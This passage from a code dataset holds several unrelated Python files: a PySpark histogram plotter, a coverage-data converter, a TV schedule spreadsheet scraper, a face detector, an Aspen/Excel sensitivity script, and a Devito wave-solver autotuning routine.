Defaults to True\n :**kwargs:\n The keyword arguments as used in matplotlib.pyplot.hist\n \"\"\"\n self.build()\n\n if formatted_yaxis:\n # Round the y-axis value to nearest thousand, million, or billion for readable y-axis\n formatter = plt.FuncFormatter(Histogram._convert_number_bmk)\n ax.yaxis.set_major_formatter(formatter)\n\n if overlapping:\n for colname in self.hist_dict:\n ax.hist(self._get_bin_centers(),\n bins=self.bin_boundaries,\n alpha=0.5,\n label=self.hist_dict.keys(),\n weights=self.hist_dict[colname],\n **kwargs\n )\n else:\n weights_multi = [self.hist_dict[colname] for colname in self.hist_dict]\n return ax.hist([self._get_bin_centers()] * len(self.hist_dict),\n bins=self.bin_boundaries,\n weights=weights_multi,\n label=self.hist_dict.keys(),\n **kwargs)\n \n def plot_density(self, ax, num=300, **kwargs):\n \"\"\"Returns a density plot on an Pyplot Axes object.\n\n Args:\n :ax: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot\n :num: (`int`)\n The number of x values the line is plotted on. Default: 300\n :**kwargs:\n Keyword arguments that are passed on to the pyplot.plot function.\n \"\"\"\n colors = []\n\n self.build()\n bin_centers = np.asarray(self._get_bin_centers())\n x_new = np.linspace(bin_centers.min(), bin_centers.max(), num)\n\n if 'color' in kwargs:\n colors = kwargs['color']\n del kwargs['color']\n\n power_smooth = []\n\n for (colname, bin_values) in self.hist_dict.items():\n normed_values, ble = np.histogram(self._get_bin_centers(),\n bins=self.bin_boundaries,\n weights=bin_values,\n density=True\n )\n interpolation_function = interp1d(bin_centers, normed_values, kind='quadratic')\n\n power_smooth.append(x_new)\n power_smooth.append(interpolation_function(x_new))\n\n lines = ax.plot(*power_smooth, **kwargs)\n\n for i, line in enumerate(lines):\n if len(colors) > 0:\n plt.setp(line, color=colors[i], label=list(self.hist_dict.keys())[i])\n else:\n plt.setp(line, label=list(self.hist_dict.keys())[i])\n\n return lines\n\n def add_data(self, data):\n \"\"\"Ads 1 or more columns to a histogram.\n\n Multiple options are available:\n * Add a single column dataframe\n * Add a list of single column dataframes\n * Add a dataframe with multiple columns\n\n Args:\n :data:\n A single column Spark dataframe, a list of single column Spark\n dataframes, or a multi column Spark dataframe.\n \"\"\"\n if isinstance(data, list):\n for df_column in data:\n self.add_column(df_column)\n\n elif len(data.columns) > 1:\n for col_name in data.columns:\n self.add_column(data.select(col_name))\n\n else:\n self.add_column(data)\n","sub_path":"pyspark_dist_explore/pyspark_dist_explore.py","file_name":"pyspark_dist_explore.py","file_ext":"py","file_size_in_byte":18280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"203751956","text":"#! 
/usr/bin/env python\n\nimport os, sys, pickle\n\ndef longest_common_prefix(elements):\n if not elements:\n return \"\"\n prefix = elements[0]\n for e in elements:\n prefix = longest_common_prefix_2(prefix, e)\n return prefix\ndef longest_common_prefix_2(a, b):\n maxlen = min(len(a), len(b))\n for i in range(maxlen, 0, -1):\n if a[:i] == b[:i]:\n return a[:i]\n return \"\"\n\n## def write_el(r2):\n## filenames = sorted(r2.keys())\n## out = open(\".figleaf.el\", \"w\")\n## out.write(\"(setq figleaf-results '(\\n\")\n## for f in filenames:\n## linenumbers = r2[f]\n## out.write(' (\"%s\" (%s))\\n' % (f, \" \".join([str(ln)\n## for ln in linenumbers])))\n## out.write(\" ))\\n\")\n## out.close()\n\ndef write_el(r2, source):\n filenames = sorted(r2.keys())\n out = open(\".figleaf.el\", \"w\")\n out.write(\"\"\"\n;; This is an elisp-readable form of the figleaf coverage data. It defines a\n;; single top-level hash table in which the load-path-relative filename (like\n;; allmydata/download.py) is the key, and the value is a three-element list.\n;; The first element of this list is a list of line numbers that represent\n;; actual code. The second is a list of line numbers for lines which got used\n;; during the unit test. The third is a list of line numbers for code lines\n;; that were not covered (since 'code' and 'covered' start as sets, this last\n;; list is equal to 'code - covered').\n\n\"\"\")\n out.write(\"(let ((results (make-hash-table :test 'equal)))\\n\")\n for f in filenames:\n covered_linenumbers = r2[f]\n code_linenumbers = source[f]\n uncovered_code = code_linenumbers - covered_linenumbers\n out.write(\" (puthash \\\"%s\\\" '((%s) (%s) (%s)) results)\\n\"\n % (f,\n \" \".join([str(ln) for ln in sorted(code_linenumbers)]),\n \" \".join([str(ln) for ln in sorted(covered_linenumbers)]),\n \" \".join([str(ln) for ln in sorted(uncovered_code)]),\n ))\n out.write(\" results)\\n\")\n out.close()\n\nimport figleaf\n\ndef examine_source(filename):\n f = open(filename, \"r\")\n lines = figleaf.get_lines(f)\n f.close()\n return lines\n\ndef main():\n results = pickle.load(open(sys.argv[1], \"rb\"))\n import_prefix = os.path.abspath(sys.argv[2])\n if not import_prefix.endswith(\"/\"):\n import_prefix = import_prefix + \"/\"\n plen = len(import_prefix)\n\n r2 = {}\n source = {}\n filenames = sorted(results.keys())\n here = os.getcwd()\n for f in filenames:\n if f.startswith(import_prefix):\n short = f[plen:]\n r2[short] = results[f]\n source[short] = examine_source(f)\n write_el(r2, source)\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"misc/testutils/figleaf2el.py","file_name":"figleaf2el.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"594303174","text":"import glob\nimport re\nimport io\n\nimport pandas as pd\nfrom openpyxl.utils import get_column_letter\n\nstudio_regex = re.compile(r'(ST(UDIOUL|\\.)\\.?|CAR\\s|PANGRATTI)\\s?(([^HAND])(.*))', flags=re.IGNORECASE)\ntime_regex = re.compile(r'(^\\d.*\\d)\\s?([^0-9.\\-:]+)?')\nstudios = {}\n\nfile = ''\nsheet = ''\n\ntypes = ['B', 'E', 'CT']\n\nheaders = ['Nume', 'Luna', 'Ziua', 'Structura', 'Functie', 'Program', 'Perioada', 'Tip', 'Filename', 'Sheet', 'Cell']\nexport_df = pd.DataFrame(columns=headers)\n\n\nclass Position:\n def __init__(self, filename, sheet, row, column):\n self.column = column\n self.row = row\n self.sheet = sheet\n self.filename = filename\n self.cell = get_column_letter(self.column + 1) + str(self.row)\n\n def 
__str__(self):\n return f'{self.filename} - {self.sheet} - {self.cell}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Studio:\n def __init__(self, name, type, programs):\n self.programs = programs\n self.type = type\n self.name = name\n\n def __str__(self):\n return f'{self.name} - {self.type} - {self.programs}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Program:\n def __init__(self, name, activities, people, source):\n self.source = source\n self.people = people\n self.activities = activities\n self.name = name\n\n def __str__(self):\n return f'{self.name} - {self.people} - {self.activities} - {self.source}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Activity:\n def __init__(self, time, type):\n self.type = type\n self.time = time\n\n def __str__(self):\n return f'{self.time} - {self.type}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Raport:\n def __init__(self, person, job_type):\n self.job_type = job_type.title()\n self.person = person\n self.filename = ''\n\n def run(self):\n global export_df\n export_df = pd.DataFrame(columns=headers)\n self.parse_folder(self.person)\n sio = io.BytesIO()\n pandasWriter = pd.ExcelWriter(sio, engine='xlsxwriter')\n export_df.to_excel(pandasWriter, sheet_name='2018', index=False)\n pandasWriter.save()\n\n sio.seek(0)\n workbook = sio.read()\n\n return {'filename': self.filename, 'data': workbook}\n\n def export(self, first_name, last_name):\n global export_df\n full_name = f'{first_name} {last_name}'.title().strip()\n self.filename = f'Raport - {full_name}.xlsx'\n dfs = []\n\n for type in types:\n dfs.append(export_df[export_df['Tip'].str.contains(type)])\n export_df = pd.concat(dfs)\n export_df.sort_values(['Ziua', 'Perioada'], ascending=True, inplace=True)\n export_df.reset_index(inplace=True, drop=True)\n export_df['Nume'][0] = full_name\n\n # export_df.to_excel(f'website/utils/raports/{self.filename}', '2018', index=False)\n # export_df.to_excel(f'\\\\\\\\192.168.0.178\\\\homes\\\\Vali\\\\Raport - {full_name}.xlsx', '2018', index=False)\n print(f'Created raport for {full_name}')\n\n def parse_folder(self, first_name, last_name=''):\n files = glob.glob('website/utils/programs/*.xls')\n for file in files:\n self.parse_file(file, first_name, last_name)\n\n self.export(first_name, last_name)\n\n def parse_file(self, filename, first_name, last_name):\n global file, sheet\n file = filename\n sheets = pd.read_excel(filename, sheet_name=None)\n sheet_names = list(sheets.keys())[1:]\n for sheet_name in sheet_names:\n sheet = sheet_name\n df = sheets[sheet_name]\n self.parse_sheet(df, first_name, last_name)\n\n def parse_sheet(self, df, first_name, last_name):\n global export_df\n\n get_studio_list(df)\n get_program_list(df)\n first_name = first_name.lower()\n last_name = last_name.lower()\n first_name_initial = first_name[0]\n date = re.match(r'(\\w+)\\s*(\\d+).(\\d+).(\\d+)', df.columns[0])\n year = date.group(4)\n if year != '2018':\n year = '2018'\n month = date.group(3)\n day = date.group(2)\n day_name = date.group(1)\n date = f'{year}.{month}.{day} ({day_name.capitalize()})'\n month_names = {1: 'Ianuarie', 2: 'Februarie', 3: 'Martie', 4: 'Aprilie', 5: 'Mai', 6: 'Iunie', 7: 'Iulie', 8: 'August', 9: 'Septembrie', 10: 'Octombrie', 11: 'Noiembrie', 12: 'Decembrie'}\n\n possible_names = [first_name]\n if last_name:\n last_name_initial = last_name[0]\n possible_names.append([last_name + ' ' + first_name, last_name + ' ' + first_name_initial, first_name + ' ' + last_name, first_name + ' ' + 
last_name_initial])\n\n for key, studio in studios.items():\n studio_name = f'{studio.type.capitalize()} {studio.name.capitalize()}'\n for program in studio.programs:\n if any(name in program.people for name in possible_names):\n for activity in program.activities:\n export_df = export_df.append({'Luna': month_names[int(month)], 'Ziua': date, 'Structura': studio_name, 'Functie': self.job_type, 'Program': program.name.title(), 'Perioada': activity.time, 'Tip': activity.type, 'Filename': program.source.filename, 'Sheet': program.source.sheet, 'Cell': program.source.cell}, ignore_index=True)\n\n\ndef is_studio(string):\n match = re.match(studio_regex, str(string))\n return match\n\n\ndef get_studio_list(df):\n global studios\n studios = {}\n for column in range(len(df.columns)):\n for cell in df[df.columns[column]]:\n match = is_studio(cell)\n cell = str(cell).lower()\n if match or cell == 'pangratti':\n studio_type = ''\n\n if cell == 'pangratti':\n name = 'Pangratti'\n studio_type = 'studio'\n else:\n name = match.group(3)\n\n if 'st' in cell:\n studio_type = 'studio'\n elif 'car' in cell:\n studio_type = 'car'\n elif 'pangratti' not in cell:\n studio_type = 'unknown'\n\n studios[name] = Studio(name, studio_type, [])\n studios['Unknown'] = Studio('Unknown', 'Unknown', [])\n\n\ndef get_next_filled_cell(df, row, column, direction=1, regex=r''):\n row += direction\n while (pd.isnull(df[df.columns[column]][row]) or (regex != r'' and not re.match(regex, df[df.columns[column]][row]))) and len(df) - 1 > row > 0:\n row += direction\n return row, column, df[df.columns[column]][row]\n\n\ndef get_program(df, time_row, column):\n if time_row == len(df) - 1:\n return len(df)\n activities = []\n names = []\n title = get_next_filled_cell(df, time_row, column, -1)\n title_name = title[2]\n studio = get_next_filled_cell(df, time_row, column, -1, studio_regex)\n times_range = (time_row, get_regex_until_ne(df, time_row, column, 1, time_regex))\n try:\n studio_name = is_studio(studio[2]).group(3) if is_studio(studio[2]).group(3) else studio[2]\n except:\n if studio[2] == 'PANGRATTI':\n studio_name = 'Pangratti'\n else:\n studio_name = 'Unknown'\n names_range = [times_range[1] + 1, get_regex_until_ne(df, times_range[1] + 1, column, 1, r'^\\D+')]\n\n # if get_next_filled_cell(df, time_row, column, 1, studio_regex)[0] != len(df) - 1:\n # names_range[1] = get_next_filled_cell(df, time_row, column, 1, studio_regex)[0] - 1\n # else:\n # names_range[1] = get_next_filled_cell(df, time_row, column, -1)[0] - 1\n\n for row in range(times_range[0], times_range[1] + 1):\n if str(get_cell(df, row, column)) == 'nan':\n continue\n match = re.match(time_regex, get_cell(df, row, column))\n if match:\n time = match.group(1)\n type = match.group(2) if match.group(2) else 'B'\n activities.append(Activity(time, type))\n\n for row in range(names_range[0], names_range[1] + 1):\n cell = str(get_cell(df, row, column))\n if cell != 'nan' and not any(x in cell for x in ['ORE', 'INTIRZ', 'PROSP', 'FILM', 'NOAPTE', 'ATENTIE', 'TINUTA', 'LEGIT', 'BULETIN', 'PROGRAM', 'PLECARE', 'PULSUL', 'HANDBAL', 'VREMEA', 'PRIETEN', 'TURA', 'JURNAL', '\\\\']):\n name = re.match(r'^[a-zA-Z\\s]+', get_cell(df, row, column).lower()).group(0).strip()\n names.append(name)\n # if name not in persons:\n # persons.append(name)\n studios[studio_name].programs.append(Program(title_name if studios[studio_name].name != '11' else 'Stiri', activities, names, Position(file[9:], sheet, title[0] + 2, column)))\n\n return times_range[1] + 1\n\n\ndef 
get_program_list(df):\n for column in range(len(df.columns)):\n row = 0\n prev_row = -1\n while prev_row != row and row < len(df) - 1:\n prev_row = row\n row = get_program(df, get_next_filled_cell(df, row, column, 1, time_regex)[0], column)\n\n\ndef get_cell(df, row, column):\n return df[df.columns[column]][row]\n\n\ndef get_regex_until_ne(df, row, column, direction, regex_to_find):\n while get_next_filled_cell(df, row, column, direction, regex_to_find)[0] < len(df) - 1:\n if not re.match(regex_to_find, get_next_filled_cell(df, row, column, direction)[2]):\n return row\n row = get_next_filled_cell(df, row, column, direction, regex_to_find)[0]\n return row\n","sub_path":"website/utils/tvr_program_scraper.py","file_name":"tvr_program_scraper.py","file_ext":"py","file_size_in_byte":9528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"111258571","text":"import cv2 # Open source computer vision library for computer vision tasks\nimport os # For interacting with the operating system\n\n# Pre-trained cascade classifier for face detection\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ndef detect_faces(img, draw_box=True):\n\t# Convert image to grayscale\n\tgrayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\t# Detect faces\n\tfaces = face_cascade.detectMultiScale(grayscale_img, scaleFactor=1.1, # Reduce the size by 5%\n\t\tminNeighbors=5, # Higher value results in fewer detections but with higher quality\n minSize=(30, 30), # How small size we want to detect\n flags=cv2.CASCADE_SCALE_IMAGE) # For an old cascade classifier\n # 0 for new format for cascade classifier \n\t\n\tface_box, face_coords = None, []\n # Draw bounding box around detected faces\n\tfor (x, y, w, h) in faces:\n\t\tif draw_box:\n\t\t\tcv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 5) # Img, Start, Color and Thickness\n\t\tface_box = img[y:y+h, x:x+w] # Crop image\n\t\tface_coords = [x,y,w,h] # Starting and ending x and Y Coordinates of face\n\n\treturn img, face_box, face_coords \n","sub_path":"face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"277492358","text":"#!/usr/bin/env pyhton\n# -*- coding: UTF-8 -*-\n\n\n__author__ = 'Chao Wu'\n__date__ = '09/08/2020'\n__version__ = '1.2'\n\n\nr'''\nThis script estimates sensitivity of outputs with respect to varied variables in .xlsm, values are enumerated (discrete) or given in range (continuous)\n\nExample\npython C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Scripts\\sensitivity_nonAspenVars.py -o C:\\Users\\cwu\\Desktop\\Outputs\\Aspen_automation\\Results\\Sugars\\sens_nonAspenVars -c C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Data\\Sugars\\sens_nonAspenVars_config.xlsx -a C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Data\\Sugars\\BC1707A_sugars_V10_mod-lite.bkp -e C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Data\\Sugars\\BC1707A_sugars_V10_mod.xlsm -n 100\n'''\n\n\n\nimport argparse\nimport os\nfrom i_o import parse_config, save_simulation_results, plot_hist\nfrom utilities import extract_input_data, generate_input_data, simulate_using_calculator\nfrom classes import Aspen, Excel\n\n\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser(description = 'This script estimates outputs according to varied variables in .xlsm, values are enumerated (discrete) or given in range 
(continuous)')\n\tparser.add_argument('-o', '--outDir', type = str, required = True, help = 'output directory')\n\tparser.add_argument('-c', '--configFile', type = str, required = True, help = 'config file, .xlsx')\n\tparser.add_argument('-a', '--aspenFile', type = str, required = True, help = 'Aspen model file, .bkp')\n\tparser.add_argument('-e', '--calculatorFile', type = str, required = True, help = 'excel calculator file, .xlsm')\n\tparser.add_argument('-d', '--varType', type = str, required = True, choices = ['dis', 'con'], help = 'input data type in config file, \"dis\" for discrete, \"con\" for continuous')\n\tparser.add_argument('-n', '--nruns', type = int, required = False, help = '# of simulation runs')\n\targs = parser.parse_args()\n\t\n\toutDir = args.outDir\n\tconfigFile = args.configFile\n\taspenFile = args.aspenFile\n\tcalculatorFile = args.calculatorFile\n\tvarType = args.varType\n\tnruns = args.nruns\n\t\n\tos.makedirs(outDir, exist_ok = True)\n\t\n\t\n\t# parse inputs and outputs\n\tinputInfos, outputInfos = parse_config(configFile)\n\t\n\tif varType == 'dis':\n\t\tinputData = extract_input_data(inputInfos)\n\telse:\n\t\tinputData = generate_input_data(inputInfos)\n\t\n\t\n\t# run simulation with calculator\n\ttry:\n\t\taspenModel = Aspen(aspenFile)\n\t\tcalculator = Excel(calculatorFile)\n\t\n\t\tsimResults = simulate_using_calculator(aspenModel, calculator, inputData, outputInfos, nruns)\n\t\n\tfinally:\n\t\taspenModel.close()\n\t\tcalculator.close()\n\t\n\t\n\t# save and plot results\n\tsave_simulation_results(simResults, outDir)\n\t\n\tplot_hist(simResults, outputInfos[['Output', 'Unit']], outDir)\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\n\n","sub_path":"AutoAspen/sensitivity_nonAspenVars.py","file_name":"sensitivity_nonAspenVars.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"16219830","text":"from devito import Function, TimeFunction, norm, Operator, Dimension, Scalar, Eq, Inc, configuration\nfrom devito.tools import memoized_meth\nfrom examples.seismic.acoustic.operators import (\n ForwardOperator, AdjointOperator, GradientOperator, BornOperator\n)\nfrom examples.checkpointing.checkpoint import DevitoCheckpoint, CheckpointOperator\nfrom pyrevolve import Revolver\nimport pyvista as pv\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom devito.types.basic import Scalar\nfrom matplotlib.pyplot import pause # noqa\nimport sys\nnp.set_printoptions(threshold=sys.maxsize) # pdb print full size\n\nclass AcousticWaveSolver(object):\n \"\"\"\n Solver object that provides operators for seismic inversion problems\n and encapsulates the time and space discretization for a given problem\n setup.\n\n Parameters\n ----------\n model : Model\n Physical model with domain parameters.\n geometry : AcquisitionGeometry\n Geometry object that contains the source (SparseTimeFunction) and\n receivers (SparseTimeFunction) and their position.\n kernel : str, optional\n Type of discretization, centered or shifted.\n space_order: int, optional\n Order of the spatial stencil discretisation. 
Defaults to 4.\n \"\"\"\n def __init__(self, model, geometry, kernel='OT2', space_order=4, **kwargs):\n self.model = model\n self.model._initialize_bcs(bcs=\"damp\")\n self.geometry = geometry\n\n assert self.model.grid == geometry.grid\n\n self.space_order = space_order\n self.kernel = kernel\n\n # Cache compiler options\n self._kwargs = kwargs\n\n @property\n def dt(self):\n # Time step can be \\sqrt{3}=1.73 bigger with 4th order\n if self.kernel == 'OT4':\n return self.model.dtype(1.73 * self.model.critical_dt)\n return self.model.critical_dt\n\n @memoized_meth\n def op_fwd(self, save=None, tteqs=(), **kwargs):\n \"\"\"Cached operator for forward runs with buffered wavefield\"\"\"\n return ForwardOperator(self.model, save=save, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n tteqs=tteqs, **self._kwargs)\n\n @memoized_meth\n def op_adj(self):\n \"\"\"Cached operator for adjoint runs\"\"\"\n return AdjointOperator(self.model, save=None, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n **self._kwargs)\n\n @memoized_meth\n def op_grad(self, save=True):\n \"\"\"Cached operator for gradient runs\"\"\"\n return GradientOperator(self.model, save=save, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n **self._kwargs)\n\n @memoized_meth\n def op_born(self):\n \"\"\"Cached operator for born runs\"\"\"\n return BornOperator(self.model, save=None, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n **self._kwargs)\n\n def forward(self, src=None, rec=None, u=None, vp=None, save=None, **kwargs):\n \"\"\"\n Forward modelling function that creates the necessary\n data objects for running a forward modelling operator.\n\n Parameters\n ----------\n src : SparseTimeFunction or array_like, optional\n Time series data for the injected source term.\n rec : SparseTimeFunction or array_like, optional\n The interpolated receiver data.\n u : TimeFunction, optional\n Stores the computed wavefield.\n vp : Function or float, optional\n The time-constant velocity.\n save : bool, optional\n Whether or not to save the entire (unrolled) wavefield.\n\n Returns\n -------\n Receiver, wavefield and performance summary\n \"\"\"\n # Source term is read-only, so re-use the default\n src = src or self.geometry.src\n # Create a new receiver object to store the result\n rec = rec or self.geometry.rec\n\n # Create the forward wavefield if not provided\n u = u or TimeFunction(name='u', grid=self.model.grid,\n save=self.geometry.nt if save else None,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n print(\"====Forward norm(u)\", norm(u))\n # Execute operator and return wavefield and receiver data\n # summary = self.op_fwd(save).apply(src=src, rec=rec, u=u, vp=vp,\n summary = self.op_fwd(save).apply(src=src, u=u, vp=vp,\n dt=kwargs.pop('dt', self.dt), **kwargs)\n print(\"====Forward norm(u)\", norm(u))\n \n\n regnormu = norm(u)\n if 0:\n cmap = plt.cm.get_cmap(\"viridis\")\n values = u.data[0, :, :, :]\n vistagrid = pv.UniformGrid()\n vistagrid.dimensions = np.array(values.shape) + 1\n vistagrid.spacing = (1, 1, 1)\n vistagrid.origin = (0, 0, 0) # The bottom left corner of the data set\n vistagrid.cell_arrays[\"values\"] = values.flatten(order=\"F\")\n vistaslices = vistagrid.slice_orthogonal()\n vistagrid.plot(show_edges=True)\n vistaslices.plot(cmap=cmap)\n\n print(\"Norm u:\", regnormu)\n\n s_u = TimeFunction(name='s_u', 
grid=self.model.grid, space_order=self.space_order, time_order=2)\n src_u = src.inject(field=s_u.forward, expr=src * self.model.grid.time_dim.spacing**2 / self.model.m)\n\n\n op_f = Operator([src_u])\n op_f.apply(src=src, dt=kwargs.pop('dt', self.dt))\n\n # import pdb;pdb.set_trace()\n print(\"Norm s_u\", norm(s_u))\n\n # Get the nonzero indices\n nzinds = np.nonzero(s_u.data[0]) # nzinds is a tuple\n assert len(nzinds) == len(self.model.grid.shape)\n shape = self.model.grid.shape\n x, y, z = self.model.grid.dimensions\n time = self.model.grid.time_dim\n t = self.model.grid.stepping_dim\n\n source_mask = Function(name='source_mask', shape=self.model.grid.shape, dimensions=(x, y, z), space_order=0, dtype=np.int32)\n\n source_id = Function(name='source_id', shape=shape, dimensions=(x, y, z), space_order=0, dtype=np.int32)\n print(\"source_id data indexes start from 0 now !!!\")\n\n # source_id.data[nzinds[0], nzinds[1], nzinds[2]] = tuple(np.arange(1, len(nzinds[0])+1))\n source_id.data[nzinds[0], nzinds[1], nzinds[2]] = tuple(np.arange(len(nzinds[0])))\n\n source_mask.data[nzinds[0], nzinds[1], nzinds[2]] = 1\n\n print(\"Number of unique affected points is:\", len(nzinds[0]))\n\n # Assert that first and last index are as expected\n assert(source_id.data[nzinds[0][0], nzinds[1][0], nzinds[2][0]] == 0)\n assert(source_id.data[nzinds[0][-1], nzinds[1][-1], nzinds[2][-1]] == len(nzinds[0])-1)\n assert(source_id.data[nzinds[0][len(nzinds[0])-1], nzinds[1][len(nzinds[0])-1], nzinds[2][len(nzinds[0])-1]] == len(nzinds[0])-1)\n\n assert(np.all(np.nonzero(source_id.data)) == np.all(np.nonzero(source_mask.data)))\n assert(np.all(np.nonzero(source_id.data)) == np.all(np.nonzero(s_u.data[0])))\n\n print(\"-At this point source_mask and source_id have been populated correctly-\")\n\n nnz_shape = (self.model.grid.shape[0], self.model.grid.shape[1])\n\n nnz_sp_source_mask = Function(name='nnz_sp_source_mask', shape=(list(nnz_shape)), dimensions=(x,y ), space_order=0, dtype=np.int32)\n\n nnz_sp_source_mask.data[:, :] = source_mask.data[:, :, :].sum(2)\n inds = np.where(source_mask.data == 1.)\n print(\"Grid - source positions:\", inds)\n maxz = len(np.unique(inds[-1]))\n # Change only 3rd dim\n sparse_shape = (self.model.grid.shape[0], self.model.grid.shape[1], maxz)\n\n assert(len(nnz_sp_source_mask.dimensions) == (len(source_mask.dimensions)-1))\n\n # Note : sparse_source_id is not needed as long as sparse info is kept in mask\n # sp_source_id.data[inds[0],inds[1],:] = inds[2][:maxz]\n\n id_dim = Dimension(name='id_dim')\n b_dim = Dimension(name='b_dim')\n\n save_src_u = TimeFunction(name='save_src_u', shape=(src.shape[0],\n nzinds[1].shape[0]), dimensions=(src.dimensions[0],\n id_dim))\n\n save_src_u_term = src.inject(field=save_src_u[src.dimensions[0], source_id], expr=src * self.model.grid.time_dim.spacing**2 / self.model.m)\n\n print(\"Injecting to empty grids\")\n op1 = Operator([save_src_u_term])\n op1.apply(src=src, dt=kwargs.pop('dt', self.dt))\n print(\"Injecting to empty grids finished\")\n sp_zi = Dimension(name='sp_zi')\n\n\n sp_source_id = Function(name='sp_source_id', shape=(list(sparse_shape)),\n dimensions=(x, y, sp_zi), space_order=0, dtype=np.int32)\n\n # Now holds IDs\n sp_source_id.data[inds[0], inds[1], :] = tuple(inds[-1][:len(np.unique(inds[-1]))])\n\n assert(np.count_nonzero(sp_source_id.data) == len(nzinds[0]))\n assert(len(sp_source_id.dimensions) == 3)\n\n # import pdb;pdb.set_trace()\n\n zind = Scalar(name='zind', dtype=np.int32)\n xb_size = Scalar(name='xb_size', 
dtype=np.int32)\n yb_size = Scalar(name='yb_size', dtype=np.int32)\n x0_blk0_size = Scalar(name='x0_blk0_size', dtype=np.int32)\n y0_blk0_size = Scalar(name='y0_blk0_size', dtype=np.int32)\n\n block_sizes = Function(name='block_sizes', shape=(4, ), dimensions=(b_dim,),\n space_order=0, dtype=np.int32)\n\n bsizes = (8, 8, 32, 32)\n block_sizes.data[:] = bsizes\n\n # eqxb = Eq(xb_size, block_sizes[0])\n # eqyb = Eq(yb_size, block_sizes[1])\n # eqxb2 = Eq(x0_blk0_size, block_sizes[2])\n # eqyb2 = Eq(y0_blk0_size, block_sizes[3])\n\n eq0 = Eq(sp_zi.symbolic_max, nnz_sp_source_mask[x, y] - 1,\n implicit_dims=(time, x, y))\n\n eq1 = Eq(zind, sp_source_id[x, y, sp_zi], implicit_dims=(time, x, y, sp_zi))\n\n # inj_u = source_mask[x, y, zind] * save_src_u[time, source_id[x, y, zind]]\n # Is source_mask needed /\n inj_u = save_src_u[time, source_id[x, y, zind]]\n\n eq_u = Inc(u.forward[t+1, x, y, zind], inj_u, implicit_dims=(time, x, y, sp_zi))\n\n # The additional time-tiling equations\n # tteqs = (eqxb, eqyb, eqxb2, eqyb2, eq0, eq1, eq_u, eq_v)\n\n performance_map = np.array([[0, 0, 0, 0, 0]])\n\n bxstart = 4\n bxend = 9\n bystart = 4\n byend = 9\n bstep = 4\n\n txstart = 32\n txend = 65\n tystart = 32\n tyend = 65\n\n tstep = 32\n # Temporal autotuning\n for tx in range(txstart, txend, tstep):\n # import pdb; pdb.set_trace()\n for ty in range(tystart, tyend, tstep):\n for bx in range(bxstart, bxend, bstep):\n for by in range(bystart, byend, bstep):\n\n block_sizes.data[:] = [tx, ty, bx, by]\n\n eqxb = Eq(xb_size, block_sizes[0])\n eqyb = Eq(yb_size, block_sizes[1])\n eqxb2 = Eq(x0_blk0_size, block_sizes[2])\n eqyb2 = Eq(y0_blk0_size, block_sizes[3])\n\n u.data[:] = 0\n print(\"-----\")\n tteqs = (eqxb, eqyb, eqxb2, eqyb2, eq0, eq1, eq_u)\n\n # import pdb; pdb.set_trace()\n\n # Execute operator and return wavefield and receiver data\n print(\"TT====Forward norm(u)\", norm(u))\n summary_tt = self.op_fwd(save, tteqs).apply(u=u, vp=vp,\n dt=kwargs.pop('dt', self.dt), **kwargs)\n print(\"TT====Forward norm(u)\", norm(u))\n # op_tt = self.op_fwd(save, tteqs)\n\n # Execute operator and return wavefield and receiver data\n #summary_tt = self.op_fwd(save).apply(src=src, rec=rec, u=u, vp=vp,\n # dt=kwargs.pop('dt', self.dt), **kwargs)\n\n # op_tt = self.op_fwd(kernel, save, tteqs)\n # summary_tt = op_tt.apply(u=u, dt=kwargs.pop('dt', self.dt), **kwargs)\n configuration['jit-backdoor'] = False\n norm_tt_u = norm(u)\n print(\"Norm u:\", regnormu)\n print(\"Norm(tt_u):\", norm_tt_u)\n configuration['jit-backdoor'] = True\n\n print(\"===Temporal blocking======================================\")\n\n performance_map = np.append(performance_map, [[tx, ty, bx, by, summary_tt.globals['fdlike'].gpointss]], 0)\n \n print(performance_map)\n # tids = np.unique(performance_map[:, 0])\n\n #for tid in tids:\n bids = np.where((performance_map[:, 0] == tx) & (performance_map[:, 1] == ty))\n bx_data = np.unique(performance_map[bids, 2])\n by_data = np.unique(performance_map[bids, 3])\n gptss_data = performance_map[bids, 4]\n gptss_data = gptss_data.reshape(len(bx_data), len(by_data))\n\n fig, ax = plt.subplots()\n im = ax.imshow(gptss_data); #pause(2)\n # We want to show all ticks...\n ax.set_xticks(np.arange(len(bx_data)))\n ax.set_yticks(np.arange(len(by_data)))\n # ... and label them with the respective list entries\n ax.set_xticklabels(bx_data)\n ax.set_yticklabels(by_data)\n\n ax.set_title(\"Gpts/s for fixed tile size. 
